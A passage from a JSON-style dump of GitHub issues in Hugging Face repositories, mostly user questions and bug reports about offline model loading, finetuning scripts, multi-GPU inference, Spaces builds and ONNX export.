    "body": "The app is running perfectly fine when internet available\n\nAll models downloaded into \n\n`os.environ['HF_HOME'] = os.path.abspath(os.path.realpath(os.path.join(os.path.dirname(__file__), './hf_download')))`\n\nWhen i set like below\n\n```\n# Set local_files_only based on offline mode\nlocal_files_only = args.offline\nif local_files_only:\n    print(\"Running in OFFLINE mode - using local models only\")\n    # Disable any online connections for HuggingFace when in offline mode\n    os.environ['HF_HUB_OFFLINE'] = '1'\n    os.environ['TRANSFORMERS_OFFLINE'] = '1'\n    os.environ['DIFFUSERS_OFFLINE'] = '1'\n\n# Load models with local_files_only parameter when in offline mode\ntext_encoder = LlamaModel.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='text_encoder', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\ntext_encoder_2 = CLIPTextModel.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='text_encoder_2', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\ntokenizer = LlamaTokenizerFast.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='tokenizer', local_files_only=local_files_only)\ntokenizer_2 = CLIPTokenizer.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='tokenizer_2', local_files_only=local_files_only)\nvae = AutoencoderKLHunyuanVideo.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='vae', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\n\nfeature_extractor = SiglipImageProcessor.from_pretrained(\"lllyasviel/flux_redux_bfl\", subfolder='feature_extractor', local_files_only=local_files_only)\nimage_encoder = SiglipVisionModel.from_pretrained(\"lllyasviel/flux_redux_bfl\", subfolder='image_encoder', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\n\ntransformer = HunyuanVideoTransformer3DModelPacked.from_pretrained('lllyasviel/FramePackI2V_HY', torch_dtype=torch.bfloat16, local_files_only=local_files_only).cpu()\n\n```\n\nand run with turning off internet i get below error\n\n`local_files_only = set as True`\n\n\n\n```\nRunning in OFFLINE mode - using local models only\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4/4 [00:00<00:00, 262.52it/s]\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connection.py\", line 198, in _new_conn\n    sock = connection.create_connection(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\util\\connection.py\", line 60, in create_connection\n    for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM):\n  File \"C:\\Python310\\lib\\socket.py\", line 955, in getaddrinfo\n    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):\nsocket.gaierror: [Errno 11001] getaddrinfo failed\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 787, in urlopen\n    response = self._make_request(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 488, in _make_request\n    raise new_e\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 464, in _make_request\n    self._validate_conn(conn)\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 1093, in _validate_conn\n    conn.connect()\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connection.py\", line 704, in connect\n    self.sock = sock = self._new_conn()\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connection.py\", line 205, in _new_conn\n    raise NameResolutionError(self.host, self, e) from e\nurllib3.exceptions.NameResolutionError: : Failed to resolve 'huggingface.co' ([Errno 11001] getaddrinfo failed)\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\requests\\adapters.py\", line 486, in send\n    resp = conn.urlopen(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 841, in urlopen\n    retries = retries.increment(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\util\\retry.py\", line 519, in increment\n    raise MaxRetryError(_pool, url, reason) from reason  # type: ignore[arg-type]\nurllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='huggingface.co', port=443): Max retries exceeded with url: /api/models/lllyasviel/FramePackI2V_HY (Caused by NameResolutionError(\": Failed to resolve 'huggingface.co' ([Errno 11001] getaddrinfo failed)\"))\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\app.py\", line 72, in \n    transformer ",
    "url": "https://github.com/huggingface/huggingface_hub/issues/3020",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-21T23:46:06Z",
    "updated_at": "2025-04-22T09:24:57Z",
    "user": "FurkanGozukara"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 378,
    "title": "How to finetune CogVideoX1.5-5B T2V LoRA?",
    "body": "Hello. I still unfamiliar with the finetuning process. I want to finetune CogVideoX1.5-5B T2V with LoRA. I have single RTX 4090. I try to re-run the bash script \"finetrainers\\examples\\training\\sft\\cogvideox\\crush_smol_lora\\train.sh\" with my own dataset and end up with error message\n`train.sh: line 130: accelerate: command not found\ntrain.sh: line 131: $'(\\r --parallel_backend accelerate\\r --pp_degree 1 --dp_degree 1 --dp_shards 1 --cp_degree 1 --tp_degree 1\\r\\r)\\r': command not found\n: No such file or directory_path THUDM/CogVideoX1.5-5B\n --dataset_config D:/TA_ucup/finetrainers/examples/training/sft/cogvideox/crush_smol_: No such file or directoryize 10\ntrain.sh: line 134: $'(\\r --dataloader_num_workers 0\\r)\\r': command not found\ntrain.sh: line 135: $'(\\r --flow_weighting_scheme logit_normal\\r)\\r': command not found\ntrain.sh: line 136: $'(\\r --training_type lora\\r --seed 42\\r --batch_size 1\\r --train_steps 3000\\r --rank 32\\r --lora_alpha 32\\r --target_modules (transformer_blocks|single_transformer_blocks).*(to_q|to_k|to_v|to_out.0)\\r --gradient_accumulation_steps 1\\r --gradient_checkpointing\\r --checkpointing_steps 1000\\r --checkpointing_limit 2\\r --enable_slicing\\r --enable_tiling\\r)\\r': command not found\ntrain.sh: line 137: $'(\\r --optimizer adamw\\r --lr 5e-5\\r --lr_scheduler constant_with_warmup\\r --lr_warmup_steps 1000\\r --lr_num_cycles 1\\r --beta1 0.9\\r --beta2 0.99\\r --weight_decay 1e-4\\r --epsilon 1e-8\\r --max_grad_norm 1.0\\r)\\r': command not found\n --validation_dataset_file D:/TA_ucup/finetrainers/examples/training/sft/cogvideox/cr: No such file or directoryon\n: No such file or directoryogvideoxeox`\nI already install the library requirements and the diffusers. Is there anything I missing?",
    "url": "https://github.com/huggingface/finetrainers/issues/378",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-21T17:17:08Z",
    "updated_at": "2025-04-24T06:24:06Z",
    "user": "MaulanaYusufIkhsanRobbani"
  },
  {
    "repo": "huggingface/trl",
    "number": 3333,
    "title": "How can I set the dataset to not shuffle? It seems there is no such option.",
    "body": "I'm using GRPOTrainer for training, and based on the logs I've printed, it seems that the dataset is being shuffled. However, the order of samples in the dataset is very important to me, and I don't want it to be shuffled. What should I do? I've checked the documentation but couldn't find any parameter to control this.",
    "url": "https://github.com/huggingface/trl/issues/3333",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-04-21T11:11:53Z",
    "updated_at": "2025-04-21T21:34:33Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/trl",
    "number": 3331,
    "title": "how to run multi-adapter PPO training in TRL==0.16.1 ?",
    "body": "In `TRL==0.11.0`, we can use multi-adapter  to train PPO model like:\n\n- $\\pi_\\text{sft}$ sft model as base model \n- $\\pi_\\text{sft} + \\text{LoRA}_\\text{rm}$ as reward model\n- $\\pi_\\text{sft} + \\text{LoRA}_\\text{policy}$ as policy model\n- $\\pi_\\text{sft} + \\text{LoRA}_\\text{critic}$ as value model\n\nin v0.16.0 how to run multi-adapter PPO training.",
    "url": "https://github.com/huggingface/trl/issues/3331",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb PPO",
      "\ud83c\udfcb SFT"
    ],
    "created_at": "2025-04-21T06:26:32Z",
    "updated_at": "2025-06-17T08:59:11Z",
    "user": "dhcode-cpp"
  },
  {
    "repo": "huggingface/huggingface_hub",
    "number": 3019,
    "title": "How to solve \"Spaces stuck in Building\" problems",
    "body": "### Describe the bug\n\nPublic spaces may stuck in Building after restarting, error log as follows:\n\nbuild error\nUnexpected job error\n\nERROR: failed to push spaces-registry.huggingface.tech/spaces/:cpu--: unexpected status from HEAD request to https://spaces-registry.huggingface.tech/v2/spaces/*/manifests/cpu-*-: 401 Unauthorized\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n```shell\n\n```\n\n### System info\n\n```shell\nThis problem can still happen in python gradio spaces without requirements.txt\n```",
    "url": "https://github.com/huggingface/huggingface_hub/issues/3019",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-21T03:11:11Z",
    "updated_at": "2025-04-22T07:50:01Z",
    "user": "ghost"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7530,
    "title": "How to solve \"Spaces stuck in Building\" problems",
    "body": "### Describe the bug\n\nPublic spaces may stuck in Building after restarting, error log as follows:\n\nbuild error\nUnexpected job error\n\nERROR: failed to push spaces-registry.huggingface.tech/spaces/*:cpu-*-*: unexpected status from HEAD request to https://spaces-registry.huggingface.tech/v2/spaces/*/manifests/cpu-*-*: 401 Unauthorized\n\n### Steps to reproduce the bug\n\nRestart space / Factory rebuild cannot avoid it\n\n### Expected behavior\n\nFix this problem\n\n### Environment info\n\nno requirements.txt can still happen\npython gradio spaces",
    "url": "https://github.com/huggingface/datasets/issues/7530",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-21T03:08:38Z",
    "updated_at": "2025-11-11T00:57:14Z",
    "user": "ghost"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1005,
    "title": "[pi0] n_action_step vs chunk_size",
    "body": "In modeling_pi0.py, the config variable `chunk_size` is never used. Instead, the action queue is set to be the size of `n_action_step`, and the training loss is also calculated on the actions of size `n_action_step`. \n\nBut I thought what should happen is that the model would predict actions of length `chunk size` (and the loss is calculated on this action length as well), and the actual execution only takes `n_action_step`. At the very least, the variable that defines the size of `action_queue` should not be the same as the variable that defines the size of the predicted action vector. They may take the same value, but should be different variables, so the user can use the config to adjust how often they want to do inference\n\nThis is also what happens in pi0fast's implementation, if I am not mistaken\n \nAm I missing something here? Thanks in advance",
    "url": "https://github.com/huggingface/lerobot/issues/1005",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-04-20T04:00:23Z",
    "updated_at": "2025-11-07T02:30:27Z",
    "user": "IrvingF7"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1000,
    "title": "How to implement a new policy?",
    "body": "How can I integrate a new policy (e.g., OpenVLA) into LeRobot, and specifically, which files do I need to modify?",
    "url": "https://github.com/huggingface/lerobot/issues/1000",
    "state": "closed",
    "labels": [
      "enhancement",
      "policies"
    ],
    "created_at": "2025-04-19T08:53:48Z",
    "updated_at": "2025-07-29T14:30:18Z",
    "user": "Elycyx"
  },
  {
    "repo": "huggingface/prettier-plugin-vertical-align",
    "number": 2,
    "title": "how to use",
    "body": "https://github.com/huggingface/prettier-plugin-vertical-align#installation\n\nAdd plugins: [\"@huggingface/prettier-plugin-vertical-align\"] to your .prettierrc file.\n\nAre you sure to .prettierrc file?",
    "url": "https://github.com/huggingface/prettier-plugin-vertical-align/issues/2",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-19T04:15:29Z",
    "updated_at": "2025-04-24T02:53:42Z",
    "user": "twotwoba"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 997,
    "title": "how to convert pi0 fast",
    "body": "i just meet pi0 convert, how to convert pi0 fast\n![Image](https://github.com/user-attachments/assets/ca6b8c52-4000-478e-88a0-501f0ce3c205)\n",
    "url": "https://github.com/huggingface/lerobot/issues/997",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-18T14:27:29Z",
    "updated_at": "2025-10-14T14:06:30Z",
    "user": "ximiluuuu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11359,
    "title": "[Feature request] LTX-Video v0.9.6 15x faster inference than non-distilled model.",
    "body": "**Is your feature request related to a problem? Please describe.**\nNo problem. This request is Low priority. As and when time allows.\n\n**Describe the solution you'd like.**\nPlease support the new release of LTX-Video 0.9.6\n\n**Describe alternatives you've considered.**\nOriginal repo have support but it is easier to use with diffusers\n\n**Additional context.**\nApril, 15th, 2025: New checkpoints v0.9.6:\nRelease a new checkpoint [ltxv-2b-0.9.6-dev-04-25](https://huggingface.co/Lightricks/LTX-Video/blob/main/ltxv-2b-0.9.6-dev-04-25.safetensors) with improved quality\nRelease a new distilled model [ltxv-2b-0.9.6-distilled-04-25](https://huggingface.co/Lightricks/LTX-Video/blob/main/ltxv-2b-0.9.6-distilled-04-25.safetensors)\n15x faster inference than non-distilled model.\nDoes not require classifier-free guidance and spatio-temporal guidance.\nSupports sampling with 8 (recommended), 4, 2 or 1 diffusion steps.\nImproved prompt adherence, motion quality and fine details.\nNew default resolution and FPS: 1216 \u00d7 704 pixels at 30 FPS\nStill real time on H100 with the distilled model.\nOther resolutions and FPS are still supported.\nSupport stochastic inference (can improve visual quality when using the distilled model)\nhttps://github.com/Lightricks/LTX-Video\n\nFeedback on distilled model\nhttps://www.reddit.com/r/StableDiffusion/comments/1k1xk1m/6_seconds_video_in_60_seconds_in_this_quality_is/\n\nhttps://www.reddit.com/r/StableDiffusion/comments/1k1o4x8/the_new_ltxvideo_096_distilled_model_is_actually/",
    "url": "https://github.com/huggingface/diffusers/issues/11359",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-18T08:05:27Z",
    "updated_at": "2025-05-09T16:03:34Z",
    "comments": 6,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1291,
    "title": "@xenova/transformers vs. @huggingface/transformers npm package",
    "body": "### Question\n\nIt's pretty confusing to have both of these on npm. Which are we supposed to use?\n\nCan you please deprecate the one that we aren't supposed to use? (`npm deprecate`)",
    "url": "https://github.com/huggingface/transformers.js/issues/1291",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-17T16:10:36Z",
    "updated_at": "2025-10-24T10:19:03Z",
    "user": "nzakas"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3510,
    "title": "Accelerate Config Error - How to debug this?",
    "body": "### System Info\n\n```Shell\npip list\n\nabsl-py                  2.2.2\naccelerate               1.6.0\nannotated-types          0.7.0\nbitsandbytes             0.45.5\ndiffusers                0.33.0.dev0 /data/roy/diffusers\nftfy                     6.3.1\nhuggingface-hub          0.30.2\nnumpy                    2.2.4\nnvidia-cublas-cu12       12.4.5.8\nnvidia-cuda-cupti-cu12   12.4.127\nnvidia-cuda-nvrtc-cu12   12.4.127\nnvidia-cuda-runtime-cu12 12.4.127\nnvidia-cudnn-cu12        9.1.0.70\nnvidia-cufft-cu12        11.2.1.3\nnvidia-curand-cu12       10.3.5.147\nnvidia-cusolver-cu12     11.6.1.9\nnvidia-cusparse-cu12     12.3.1.170\nnvidia-cusparselt-cu12   0.6.2\nnvidia-nccl-cu12         2.21.5\nnvidia-nvjitlink-cu12    12.4.127\nnvidia-nvtx-cu12         12.4.127\npackaging                24.2\npeft                     0.15.2\npip                      22.0.2\nprotobuf                 5.29.4\nsafetensors              0.5.3\nsetuptools               59.6.0\ntokenizers               0.21.1\ntorch                    2.6.0\ntorchvision              0.21.0\ntransformers             4.51.3\ntriton                   3.2.0\nwandb                    0.19.9\n... etc\n\n\nnvidia-smi\n\n+-----------------------------------------------------------------------------------------+\n| NVIDIA-SMI 570.124.06             Driver Version: 570.124.06     CUDA Version: 12.8     |\n|-----------------------------------------+------------------------+----------------------+\n| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |\n| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |\n|                                         |                        |               MIG M. |\n|=========================================+========================+======================|\n|   0  NVIDIA H100 PCIe               Off |   00000000:2E:00.0 Off |                    0 |\n| N/A   43C    P0             84W /  350W |   16460MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   1  NVIDIA H100 PCIe               Off |   00000000:30:00.0 Off |                    0 |\n| N/A   45C    P0             89W /  350W |   11456MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   2  NVIDIA H100 PCIe               Off |   00000000:3F:00.0 Off |                    0 |\n| N/A   40C    P0             86W /  350W |   11384MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   3  NVIDIA H100 PCIe               Off |   00000000:41:00.0 Off |                    0 |\n| N/A   36C    P0             47W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   4  NVIDIA H100 PCIe               Off |   00000000:B0:00.0 Off |                    0 |\n| N/A   46C    P0             87W /  350W |   11384MiB /  81559MiB |    100%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   5  NVIDIA H100 PCIe               Off |   00000000:B1:00.0 Off |                    0 |\n| N/A   39C    P0             48W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   6  NVIDIA H100 PCIe               Off |   00000000:C1:00.0 Off |                    0 |\n| N/A   35C    P0             52W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n|   7  NVIDIA H100 PCIe               Off |   00000000:C2:00.0 Off |                    0 |\n| N/A   35C    P0             51W /  350W |       1MiB /  81559MiB |      0%      Default |\n|                                         |                        |             Disabled |\n+-----------------------------------------+------------------------+----------------------+\n                                                                                         \n+-----------------------------------------------------------------------------------------+\n| Processes:                                                                ",
    "url": "https://github.com/huggingface/accelerate/issues/3510",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-17T11:12:50Z",
    "updated_at": "2025-05-19T08:46:12Z",
    "user": "KihongK"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11351,
    "title": "Why Wan i2v video processor always float32 datatype?",
    "body": "### Describe the bug\n\nI found   \n\nimage = self.video_processor.preprocess(image, height=height, width=width).to(device, dtype=torch.float32)\n\nhttps://github.com/huggingface/diffusers/blob/29d2afbfe2e09a4ee7cc51455e51ce8b8c0e252d/src/diffusers/pipelines/wan/pipeline_wan_i2v.py#L633\n\nin pipeline_wan_i2v.py\n\nwhy datatype always float32, maybe it's a bug\n\n### Reproduction\n\njust run \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nany platform\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11351",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-17T07:00:42Z",
    "updated_at": "2025-05-07T03:48:24Z",
    "comments": 2,
    "user": "DamonsJ"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37570,
    "title": "How to streaming output audio of Qwen2.5-omni-7b",
    "body": "All the examples of qwen2.5-omni-7b did not show how to streaming output audio, with passing streamer, I am able to get streaming text, but how can I get the streaming audio output?",
    "url": "https://github.com/huggingface/transformers/issues/37570",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-17T04:16:35Z",
    "updated_at": "2025-07-30T08:03:44Z",
    "user": "qinxuye"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11339,
    "title": "How to multi-GPU WAN inference",
    "body": "Hi,I didn't find multi-gpu inferences  example in the documentation. Can you give me an example, such as Wan2.1-I2V-14B-720P-Diffusers.\nI would appreciate some help on that, thank you in advance",
    "url": "https://github.com/huggingface/diffusers/issues/11339",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-16T10:22:41Z",
    "updated_at": "2025-07-05T21:18:01Z",
    "user": "HeathHose"
  },
  {
    "repo": "huggingface/trl",
    "number": 3295,
    "title": "i have 2 gpu\uff0cbut default gpu:0,How to specify a gpu:1 for training?",
    "body": "### Reproduction\n\n```python\nfrom trl import ...\n\n```\n\noutputs:\n\n```\nTraceback (most recent call last):\n  File \"example.py\", line 42, in \n    ...\n```\n\n\n### System Info\n\ni have 2 gpu\uff0cbut default gpu:0,How to specify a gpu:1 for training?\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete",
    "url": "https://github.com/huggingface/trl/issues/3295",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83d\udcf1 cli"
    ],
    "created_at": "2025-04-15T08:29:26Z",
    "updated_at": "2025-04-24T19:46:37Z",
    "user": "Aristomd"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 981,
    "title": "How can I simulate robots without physical robots? How should I learn simulation robots? Do you have any good recommendations?",
    "body": "How can I simulate robots without physical robots? How should I learn simulation robots? Do you have any good recommendations?I am a beginner.",
    "url": "https://github.com/huggingface/lerobot/issues/981",
    "state": "closed",
    "labels": [
      "question",
      "simulation"
    ],
    "created_at": "2025-04-15T04:04:33Z",
    "updated_at": "2025-10-17T11:19:34Z",
    "user": "harryhu0301"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11321,
    "title": "flux controlnet train  ReadMe have a bug",
    "body": "### Describe the bug\n\n![Image](https://github.com/user-attachments/assets/bc20df10-80b0-46fa-b013-799a3b1865b4)\n\nwhat is the controlnet config parameters?  text is num_single_layers = 10, but the code set num_single_layers=0?\n\n### Reproduction\n\ncheck readme file\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\ndiffusers ==0.33.0\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11321",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-04-15T01:30:58Z",
    "updated_at": "2025-10-11T09:58:52Z",
    "comments": 14,
    "user": "Johnson-yue"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 428,
    "title": "[QUESTION] Current schedule is non-sensical",
    "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer you can ask here, please **be specific**.\n\nThe course page states:\n\n> There\u2019s a deadline for the certification process: all the assignments must be finished before May 1st 2025.\n\nBut the \"when will the next units be published\" graph doesn't have Unit 4 even being released until \"The end of April\". And as of today (April 14, 2025) we still have no idea what any of the \"use case assignments\" are. As it stands, it appears to be impossible to actually complete this course.\n\n\nAnd no one from Hugging Face seems to be answering, or even acknowledging, any questions on this topic. It would be nice to get some clarity / updates.\n",
    "url": "https://github.com/huggingface/agents-course/issues/428",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-14T18:13:31Z",
    "updated_at": "2025-04-28T06:51:58Z",
    "user": "mindcrime"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 975,
    "title": "[Question] How to modify model & dataset to accept two input images in observation.image?",
    "body": "Hi, thank you for the great repo!\n\nI\u2019ve been going through the first three examples, and now I\u2019d like to explore training a diffusion policy with some customized input. Specifically:\n\nMy goal:\nI want each observation.image to contain two images as input (they have the same shape as the original single image).\n\nI want the output of the model to remain the same as in the original diffusion policy.\n\nMy question:\nSince I\u2019m new to this repo, I\u2019d like to ask for guidance on what needs to be modified to support this:\n\nModel architecture: which parts of the model code should I look at or modify to handle a double-image input?\n\nDataset / Data loading: where should I modify the dataset to provide observation.image with two images instead of one?\n\nAre there any other components I should be aware of (e.g., pre-processing, normalization, config changes, etc.)?\n\nAny advice or pointers to relevant parts of the code would be greatly appreciated!\n\nThanks in advance \ud83d\ude4f",
    "url": "https://github.com/huggingface/lerobot/issues/975",
    "state": "closed",
    "labels": [
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-14T08:35:47Z",
    "updated_at": "2025-11-04T02:30:23Z",
    "user": "Keith-Luo"
  },
  {
    "repo": "huggingface/candle",
    "number": 2893,
    "title": "How to build a multi-node inference/training in candle?",
    "body": "Hi team,\n\nI'd like to have an example on mulit-node inference/training of candle, how can I find it?\n\nThanks :)\n\n-- Klaus",
    "url": "https://github.com/huggingface/candle/issues/2893",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-14T08:03:20Z",
    "updated_at": "2025-04-14T08:03:20Z",
    "user": "k82cn"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1795,
    "title": "Offline Custom Tools",
    "body": "Would it be possible to define/use tools that the LLMs can use in an offline state?\n\n\"Tools must use Hugging Face Gradio Spaces as we detect the input and output types automatically from the [Gradio API](https://www.gradio.app/guides/sharing-your-app#api-page).\"\n\n\nIs there any reason that the tools can't be hosted locally with the same ability for the LLM to use?",
    "url": "https://github.com/huggingface/chat-ui/issues/1795",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-04-14T02:41:19Z",
    "updated_at": "2025-04-14T02:41:19Z",
    "comments": 0,
    "user": "cr-intezra"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1794,
    "title": "Docker Image and Local Install missing file/image/etc upload",
    "body": "I've used the chat-ui-db:latest image as well as cloning the repo, setting up mongo and npm install/run dev and the UI I get does not have the icons or ability to upload in image or file. It only has the web search button.\n\nThis would be for release 0.9.4.\n\nIs there something in .env.local that I am missing to enable this feature?\n\nOtherwise the chat-ui works as intended, I am able to use different models but wanted to test the ability to use a vision model.\n\n![Image](https://github.com/user-attachments/assets/92c3117b-0f8e-467f-91e7-7ca4f7b95539)",
    "url": "https://github.com/huggingface/chat-ui/issues/1794",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-13T19:30:29Z",
    "updated_at": "2025-04-13T19:30:29Z",
    "comments": 0,
    "user": "cr-intezra"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2228,
    "title": "Unable to convert an audio-to-audio model.",
    "body": "### Feature request\n\n``` bash\noptimum-cli export onnx --model microsoft/speecht5_vc speecht5_vc_onnx/\n```\n\nOutput:\n\n``` log\nThe cache for model files in Transformers v4.22.0 has been updated. Migrating your old cache. This is a one-time only operation. You can interrupt this and resume the migration later on by calling `transformers.utils.move_cache()`.\n0it [00:00, ?it/s]\nTraceback (most recent call last):\n  File \"/usr/local/bin/optimum-cli\", line 8, in \n    sys.exit(main())\n             ^^^^^^\n  File \"/usr/local/lib/python3.12/dist-packages/optimum/commands/optimum_cli.py\", line 208, in main\n    service.run()\n  File \"/usr/local/lib/python3.12/dist-packages/optimum/commands/export/onnx.py\", line 265, in run\n    main_export(\n  File \"/usr/local/lib/python3.12/dist-packages/optimum/exporters/onnx/__main__.py\", line 296, in main_export\n    raise ValueError(\nValueError: Asked to export a speecht5 model for the task audio-to-audio (auto-detected), but the Optimum ONNX exporter only supports the tasks text-to-audio for speecht5. Please use a supported task. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the task audio-to-audio to be supported in the ONNX export for speecht5.\n```\n\n### Motivation\n\nMy primary objective is to convert Hugging Face models to TensorRT, but according to the documentation I've reviewed, ONNX must be used as an intermediate step\n\n### Your contribution\n\nI don't believe I have the technical capability to implement this feature.",
    "url": "https://github.com/huggingface/optimum/issues/2228",
    "state": "closed",
    "labels": [
      "Stale"
    ],
    "created_at": "2025-04-13T00:50:26Z",
    "updated_at": "2025-05-18T02:17:06Z",
    "comments": 1,
    "user": "divinerapier"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 971,
    "title": "Can different robotic arms share the same dataset and model?",
    "body": "English\uff1a\nI currently have datasets and models for the Koch, SO100, and ALOHA robotic arms. Is it possible for these three arms to share the same dataset and model? If so, how should this be implemented? If not\u2014given the significant hardware differences\u2014what is the practical value of data sharing in this context?\n@Cadene \n\n\u4e2d\u6587\uff1a\n\u6211\u8fd9\u91cc\u6709koch\u3001so100\u3001alhoa\u7684\u6570\u636e\u96c6\u548c\u6a21\u578b\uff0c\u4e09\u6b3e\u673a\u68b0\u81c2\u80fd\u5171\u7528\u6570\u636e\u96c6\u5408\u6a21\u578b\u4e48\uff1f\u5982\u679c\u80fd\uff0c\u600e\u4e48\u7528\uff1f\u5982\u679c\u4e0d\u80fd\uff0c\u90a3\u786c\u4ef6\u5343\u5dee\u4e07\u522b\uff0c\u6570\u636e\u5171\u4eab\u7684\u610f\u4e49\u4f55\u5728\uff1f\n",
    "url": "https://github.com/huggingface/lerobot/issues/971",
